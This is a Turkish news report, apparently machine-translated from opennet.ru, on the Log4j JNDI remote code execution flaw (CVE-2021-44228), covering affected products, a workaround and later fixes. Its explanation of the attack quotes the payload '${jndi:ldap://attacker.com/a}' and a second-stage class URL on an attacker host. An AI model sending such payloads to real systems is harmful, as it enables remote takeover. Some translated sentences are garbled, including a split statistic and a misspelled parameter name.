Java uygulamalarında günlüğe kaydetmeyi düzenlemek için kullanılan popüler bir çerçeve olan Apache Log4j'de, günlüğe “{jndi:URL}” biçiminde özel olarak biçimlendirilmiş bir değer yazıldığında rastgele kod çalıştırılmasına izin veren kritik bir güvenlik açığı belirlendi. Saldırı, örneğin hata mesajlarında sorunlu değerleri görüntülerken, harici kaynaklardan alınan değerleri günlüğe kaydeden Java uygulamaları üzerinde gerçekleştirilebilir.
Steam, Apple iCloud, Minecraft istemcileri ve sunucuları da dahil olmak üzere Apache Struts, Apache Solr, Apache Druid veya Apache Flink gibi çerçeveleri kullanan neredeyse tüm projelerin sorundan etkilendiği belirtiliyor. Güvenlik açığının kurumsal uygulamalara yönelik büyük bir saldırı dalgasına yol açması ve kaba bir tahmine göre Fortune'un %65'i tarafından web uygulamalarında kullanılan Apache Struts çerçevesindeki kritik güvenlik açıklarının geçmişini tekrarlaması bekleniyor. 100 şirket. Ağı savunmasız sistemlere karşı tarama girişimleri de dahil.
Sorun, çalışan bir istismarın zaten yayınlanmış olması, ancak kararlı dallara yönelik düzeltmelerin henüz derlenmemiş olması nedeniyle daha da kötüleşiyor. CVE tanımlayıcısı henüz atanmadı. Düzeltme yalnızca log4j-2.15.0-rc1 test dalına dahil edilmiştir. Güvenlik açığının engellenmesine yönelik bir geçici çözüm olarak log4j2.formatMsgNoLokups parametresinin true olarak ayarlanması önerilir.
Sorun, log4j'nin, JNDI (Java Adlandırma ve Dizin Arayüzü) sorgularının yürütülebileceği, günlüğe çıkan satırlarda özel "{}" maskelerinin işlenmesini desteklemesinden kaynaklanıyordu. Saldırı, işlendikten sonra log4j'nin saldırgan.com sunucusuna Java sınıfının yolu için bir LDAP isteği göndereceği "${jndi:ldap://attacker.com/a}" yerine geçen bir dizenin iletilmesinden ibarettir. . Saldırganın sunucusunun döndürdüğü yol (örneğin, http://second-stage.attacker.com/Exploit.class) mevcut işlem bağlamında yüklenecek ve yürütülecektir; bu, saldırganın bilgisayarda rastgele kod yürütmesine olanak tanır. Mevcut uygulamanın haklarına sahip sistem.
Ek 1: Güvenlik açığına CVE-2021-44228 tanımlayıcısı atandı.
Ek 2: log4j-2.15.0-rc1 sürümüyle eklenen korumayı atlamanın bir yolu belirlendi. Güvenlik açığına karşı daha kapsamlı koruma sağlayan yeni bir güncelleme olan log4j-2.15.0-rc2 önerildi. Kod, yanlış biçimlendirilmiş bir JNDI URL'si kullanılması durumunda anormal bir sonlandırmanın olmamasıyla ilişkili değişikliği vurgular.
Kaynak: opennet.ru